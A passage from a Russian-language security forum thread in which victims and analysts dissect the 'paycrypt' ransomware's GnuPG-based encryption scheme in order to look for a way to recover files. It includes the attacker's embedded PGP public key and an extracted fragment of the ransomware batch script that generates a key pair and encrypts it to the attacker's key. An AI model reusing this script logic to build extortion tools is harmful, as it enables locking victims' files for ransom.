Перейти к содержимому


Фото
* * * * * 1 Голосов

Зашифрованы файлы, *.paycrypt@gmail_com и др.


  • Please log in to reply
841 ответов в этой теме

#501 HHH

HHH

    Massive Poster

  • Posters
  • 2 714 Сообщений:

Отправлено 29 Август 2014 - 17:47

Например что-то вроде вот такой ссылки - http://windows.microsoft.com/ru-ru/windows-8/how-use-file-history



#502 ghoser

ghoser

    Newbie

  • Members
  • 2 Сообщений:

Отправлено 29 Август 2014 - 21:13

 

 

 

... "Потеряны" только 3-4 рабочих файла, которые нужны для ежедневной работы, но и их можно восстановить, ибо порывшись в почте я обнаружил их там за небольшой давностью (1-3 недели); вопрос актуализации - один-два дня максимум, т.к. все бумажные копии документов имеются.

 

я бы на вашем месте сбросил их злоумышленникам и попросил для теста расшифровать.

 

Нет, они - в формате .xls , а этот формат они "на халяву" не расшифровывают (с объяснением - "по понятным причинам").

 

у меня как раз и был файл в xls )) видимо убедила моя манера общения) 



#503 Kap_Killer

Kap_Killer

    Newbie

  • Posters
  • 10 Сообщений:

Отправлено 30 Август 2014 - 18:34

v.martyanov, насколько понимаю для KEYBTC UNIQUE.PRIVATE шифруется пользовательским ключом в отличии от KEY.PRIVATE, следовательно у вас должны быть расшифрованные файлы - можете выложить формат этого файла или один из тех, что вам присылали?



#504 santy

santy

    Member

  • Posters
  • 245 Сообщений:

Отправлено 30 Август 2014 - 18:52

можете выложить формат этого файла или один из тех, что вам присылали?

а что это даст? в KEY.UNIQUE содержится список зашифрованных документов (полные имена) пользователя


Сообщение было изменено santy: 30 Август 2014 - 18:53


#505 Kap_Killer

Kap_Killer

    Newbie

  • Posters
  • 10 Сообщений:

Отправлено 30 Август 2014 - 19:56

santy, подозреваю, что по этому файлу оценивают в том числе платежеспособность клиента. Его, насколько понимаю можно сформировать заново с нужным списком, но для этого нужно знать формат.


Сообщение было изменено Kap_Killer: 30 Август 2014 - 19:57


#506 usverg

usverg

    Advanced Member

  • Posters
  • 701 Сообщений:

Отправлено 30 Август 2014 - 20:11

нужно знать формат
если это Вас так интересует, формат там простейший и чтобы его узнать просто внимательно "прочитайте" cmd файл этой заразы (это простой текст).

But a thing of beauty, I know, will never fade away...


#507 santy

santy

    Member

  • Posters
  • 245 Сообщений:

Отправлено 31 Август 2014 - 05:56

santy, подозреваю, что по этому файлу оценивают в том числе платежеспособность клиента. Его, насколько понимаю можно сформировать заново с нужным списком, но для этого нужно знать формат.

сформировать то можно, но зашифровать обратно (нужным ключом) не получится, поскольку для зашифровки в KEY.UNIQUE нужна секретная часть ключа, которым выполнено шифрование документов пользователя.


Сообщение было изменено santy: 31 Август 2014 - 05:57


#508 Kap_Killer

Kap_Killer

    Newbie

  • Posters
  • 10 Сообщений:

Отправлено 31 Август 2014 - 10:44

usverg, какой cmd файл? У меня есть только один cmd-файл - это keybase.cmd, но там ничего толком нет, просто для каждого файла шифрование, move и rename и всё. Есть ещё удалённый антивирем keybtc.bat, но в нем иероглифы.
 
santy, почему-то считал, что секретный ключ нужен для расшифровки, а для зашифровки нужен публичный, разве не так?



#509 usverg

usverg

    Advanced Member

  • Posters
  • 701 Сообщений:

Отправлено 31 Август 2014 - 11:13

keybtc.bat, но в нем иероглифы
а вы посмотрите его в кодировке utf-16  :)

But a thing of beauty, I know, will never fade away...


#510 thyrex

thyrex

    Member

  • Posters
  • 279 Сообщений:

Отправлено 31 Август 2014 - 12:10

почему-то считал, что секретный ключ нужен для расшифровки, а для зашифровки нужен публичный, разве не так?
Именно так

#511 santy

santy

    Member

  • Posters
  • 245 Сообщений:

Отправлено 31 Август 2014 - 12:13

santy, почему-то считал, что секретный ключ нужен для расшифровки, а для зашифровки нужен публичный, разве не так?

да, верно. все так публичный ключ может оказаться на компе в темповых папках.

>

bat смотреть в UTF-8



#512 Kap_Killer

Kap_Killer

    Newbie

  • Posters
  • 10 Сообщений:

Отправлено 31 Август 2014 - 15:53

У меня похоже, что Nod грохнул вирус после вызова keybase.cmd

Т.к. дальше идут строчки

if exist "%USERPROFILE%\Desktop\UNIQUE.PRIVATE" echo  BITM>> "%USERPROFILE%\Desktop\UNIQUE.PRIVATE"

И т.д.

Но дописанного " BITM" в UNIQUE.PRIVATE у меня нет.



#513 santy

santy

    Member

  • Posters
  • 245 Сообщений:

Отправлено 31 Август 2014 - 16:24

тесты надо проводить в папке, которая добавлена в исключения антивируса. можно восстановить из карантина.

дошло наконец, что в батнике используются два публик-ключа.

это может быть два различных ключа, или ключ + подключ.

 

скажем такой:

 

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1 - GPGshell v3.78

mI0EU66eugEEAMUDWYQ1l5N4ItPb23UBA6Embly6Zenqiut9m1h3Ac6L8sKn+ZJ4
F67ytP5de2eNEkGAxgwO2BSmmFCZ+OKx3U0M8gim+YlYm6Ho9irtrqHqdqBF8UmG
dz8SsGDe1OPUJsOZ7bZ80K3YM+TnEGtxt3nU9hynw3enyBI8SaT3SySDABEBAAG0
Jkhja1RlYW0gKEhja1RlYW0pIDxwYXljcnlwdEBnbWFpbC5jb20+iLgEEwECACIF
AlOunroCGwMGCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEDY5qe4+146FFo8D
/Ayg3NQDHX9O5BhIzhWwcbYHxwJRqvyi2ZENCqI9hM53BHJQFKR1YUhX9kAfKEbY
gPJWYOg1QYY3VpEuNCHTJENCwXwH6DYs99GwO7f/8Dc6F7aDdGo3GSWKEwPuHv0F
FM7lcfz3GkGiSJWdTwHh383FmLY+cHk6ALf+EcgKA3PmuI0EU66eugEEANu1dTdR
fjZ99jViRV3FXPF3wrMTh1ODqeMLu9sYDtAKn5VgqbOQcymkRq4MMrX8St1VjAQ4
Wsxbl47Wo4opsqogVUQV2ok2vm35u3OELQlR6Loihu+CksAxaloPGe5IyryJ+Cbn
ymRvoHlPVhExYD3FQCiomXmrYm173ipIKlkzABEBAAGInwQYAQIACQUCU66eugIb
DAAKCRA2OanuPteOheY5BACvmE5n9gNr66SjIK6z2i1FC5Ei5R15jeu42C560Q3M
76gS6nSwdxaVjCynMts1Y/xRFd360RIBLY5XA4INteXUSYvUjKarF9mpPqorJ1fh
XRK2jlwW+1ppH5rpWxP8WfTfHOHmOAjVM0EjlqjjOiqByJfXWoufBzt5uMQ/rnmi
gQ==
=f2Fp
-----END PGP PUBLIC KEY BLOCK-----

 

:public key packet:
    version 4, algo 1, created 1403952826, expires 0
    pkey[0]: [1024 bits]
    pkey[1]: [17 bits]
    keyid: 3639A9EE3ED78E85
:user ID packet: "HckTeam (HckTeam) <paycrypt@gmail.com>"
:signature packet: algo 1, keyid 3639A9EE3ED78E85
    version 4, created 1403952826, md5len 0, sigclass 0x13
    digest algo 2, begin of digest 16 8f
    hashed subpkt 2 len 4 (sig created 2014-06-28)
    hashed subpkt 27 len 1 (key flags: 03)
    hashed subpkt 11 len 5 (pref-sym-algos: 9 8 7 3 2)
    hashed subpkt 21 len 5 (pref-hash-algos: 8 2 9 10 11)
    hashed subpkt 22 len 3 (pref-zip-algos: 2 3 1)
    hashed subpkt 30 len 1 (features: 01)
    hashed subpkt 23 len 1 (key server preferences: 80)
    subpkt 16 len 8 (issuer key ID 3639A9EE3ED78E85)
    data: [1020 bits]
:public sub key packet:
    version 4, algo 1, created 1403952826, expires 0
    pkey[0]: [1024 bits]
    pkey[1]: [17 bits]
    keyid: 7856602BF05CF9EE
:signature packet: algo 1, keyid 3639A9EE3ED78E85
    version 4, created 1403952826, md5len 0, sigclass 0x18
    digest algo 2, begin of digest e6 39
    hashed subpkt 2 len 4 (sig created 2014-06-28)
    hashed subpkt 27 len 1 (key flags: 0C)
    subpkt 16 len 8 (issuer key ID 3639A9EE3ED78E85)
    data: [1024 bits]
-----------------------

вот эта часть нередко используется для шифрования KEY.PRIVATE

 

:public sub key packet:
    version 4, algo 1, created 1403952826, expires 0
    pkey[0]: [1024 bits]
    pkey[1]: [17 bits]
    keyid: 7856602BF05CF9EE

 


Сообщение было изменено santy: 31 Август 2014 - 16:26


#514 Kap_Killer

Kap_Killer

    Newbie

  • Posters
  • 10 Сообщений:

Отправлено 31 Август 2014 - 16:28

santy, тесты надо проводить в песочнице. Про Nod я написал про 25 августа в момент заражения на подхватившей машине.



#515 santy

santy

    Member

  • Posters
  • 245 Сообщений:

Отправлено 31 Август 2014 - 16:38

Kap_Killer, теперь понятен ход мысли.

 

вопрос. батник, который закачивается на комп юзера уже создан под этого юзера? т.е. предварительно на стороне злоумышленников создается_генерируется батник с уникальным для юзера пуб ключом?


Сообщение было изменено santy: 31 Август 2014 - 16:41


#516 Kap_Killer

Kap_Killer

    Newbie

  • Posters
  • 10 Сообщений:

Отправлено 31 Август 2014 - 16:46

santy, насколько понимаю у вас, как и у меня один публичный ключ с двумя криптоключами.

 

т.е. предварительно на стороне злоумышленников создается батник с уникальным для юзера пуб ключом?

 

Неправильно, схема проще, пользовательский ключ генерится на стороне пользователя, после этого приватная часть созданного ключа шифруется с использованием импортированного публичного ключа создателя вируса и переименовывается в KEY.PRIVATE и после этого затирается sdelete, ну и дальше шифруются файлы с использованием публичного сгенерённого пользовательского ключа.



#517 santy

santy

    Member

  • Posters
  • 245 Сообщений:

Отправлено 31 Август 2014 - 17:04

Kap_Killer,

 

ключ то генерится, но генерится он из текста, который зашит в готовом батнике.

я выдернул эту часть из батника (вместо taskmgr.exe переписал gpg.exe) чтобы посмотреть, что же в итоге будет создано.

 

cd "%TEMP%"
if exist "%temp%\paycrpt.bin" goto autoreply
echo paycrypt> "%temp%\paycrpt.bin"
cd "%appdata%"
REM rename "%APPDATA%\gnupg" gnupg_old%random%
REM attrib -s -h -r "%appdata%\gnupg\*.*"
REM attrib -s -h -r "%appdata%\gnupg"
REM del /f /q "%appdata%\gnupg\*.*"
REM rmdir /s /q "%appdata%\gnupg"
REM rename "%temp%\day.btc" iconv.dll
cd "%temp%"
set line1=fjZ99jViRV3FXPF3wrMTh1ODqeMLu9sYDtAKn5VgqbOQcymkRq4MMrX8St1VjAQ4
echo Key-Type: RSA> genky.btc
echo Key-Length: 1024>> genky.btc
echo Name-Real: cryptpay>> genky.btc
echo Name-Comment: cryptpay>> genky.btc
echo Name-Email: paycrypt@gmail.com>> genky.btc
set line2=ymRvoHlPVhExYD3FQCiomXmrYm173ipIKlkzABEBAAGInwQYAQIACQUCU66eugIb
set line3=DAAKCRA2OanuPteOheY5BACvmE5n9gNr66SjIK6z2i1FC5Ei5R15jeu42C560Q3M
echo -----BEGIN PGP PUBLIC KEY BLOCK-----> paycrypt.btc
echo Version: GnuPG v1>> paycrypt.btc
echo.>> paycrypt.btc
set fork=jp
echo mI0EU66eugEEAMUDWYQ1l5N4ItPb23UBA6Embly6Zenqiut9m1h3Ac6L8sKn+ZJ4>> paycrypt.btc
echo F67ytP5de2eNEkGAxgwO2BSmmFCZ+OKx3U0M8gim+YlYm6Ho9irtrqHqdqBF8UmG>> paycrypt.btc
echo dz8SsGDe1OPUJsOZ7bZ80K3YM+TnEGtxt3nU9hynw3enyBI8SaT3SySDABEBAAG0>> paycrypt.btc
echo Jkhja1RlYW0gKEhja1RlYW0pIDxwYXljcnlwdEBnbWFpbC5jb20+iLgEEwECACIF>> paycrypt.btc
echo AlOunroCGwMGCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEDY5qe4+146FFo8D>> paycrypt.btc
echo /Ayg3NQDHX9O5BhIzhWwcbYHxwJRqvyi2ZENCqI9hM53BHJQFKR1YUhX9kAfKEbY>> paycrypt.btc
echo gPJWYOg1QYY3VpEuNCHTJENCwXwH6DYs99GwO7f/8Dc6F7aDdGo3GSWKEwPuHv0F>> paycrypt.btc
echo FM7lcfz3GkGiSJWdTwHh383FmLY+cHk6ALf+EcgKA3PmuI0EU66eugEEANu1dTdR>> paycrypt.btc
echo %line1%>> paycrypt.btc
echo Wsxbl47Wo4opsqogVUQV2ok2vm35u3OELQlR6Loihu+CksAxaloPGe5IyryJ+Cbn>> paycrypt.btc
echo %line2%>> paycrypt.btc
echo %line3%>> paycrypt.btc
echo 76gS6nSwdxaVjCynMts1Y/xRFd360RIBLY5XA4INteXUSYvUjKarF9mpPqorJ1fh>> paycrypt.btc
echo XRK2jlwW+1ppH5rpWxP8WfTfHOHmOAjVM0EjlqjjOiqByJfXWoufBzt5uMQ/rnmi>> paycrypt.btc
echo gQ==>> paycrypt.btc
echo =f2Fp>> paycrypt.btc
echo -----END PGP PUBLIC KEY BLOCK----->> paycrypt.btc
pgp.exe --homedir "%temp%" --batch --gen-key "%temp%\genky.btc"
PGP.exe --import "%temp%\paycrypt.btc"
pgp.exe -r HckTeam --yes --trust-model always --no-verbose -q --encrypt-files "%temp%\secring.gpg"

в итоге получаю secring.gpg 0 байт.


Сообщение было изменено santy: 31 Август 2014 - 17:04


#518 Kap_Killer

Kap_Killer

    Newbie

  • Posters
  • 10 Сообщений:

Отправлено 31 Август 2014 - 18:50

santy, secring.gpg где смотрите? Нужно искать в "%temp%", т.к. ключ задан --homedir "%temp%"



#519 santy

santy

    Member

  • Posters
  • 245 Сообщений:

Отправлено 01 Сентябрь 2014 - 05:09

Kap_Killer, да, там и смотрю. я уже и батник перекинул в  %temp%. и кстати, видел по другим примерам (1-2), когда скидывали содержимое темповских папок. везде secring.gpg был нулевого размера.



#520 santy

santy

    Member

  • Posters
  • 245 Сообщений:

Отправлено 01 Сентябрь 2014 - 07:38

видимо важно, чтобы в папке был  random_seed

в этом случае нормально генерится  secring.gpg, собственно пара pubring.gpg, secring.gpg всякий раз создается новая, при каждом запуске батника, а вот paycrypt.btc естественно, всякий раз один и тот де. paycrypt.btc содержит подключ (публичную часть в данном случае этого ключа F05CF9EE), которым и выполняется далее шифрование secring.gpg


Сообщение было изменено santy: 01 Сентябрь 2014 - 07:39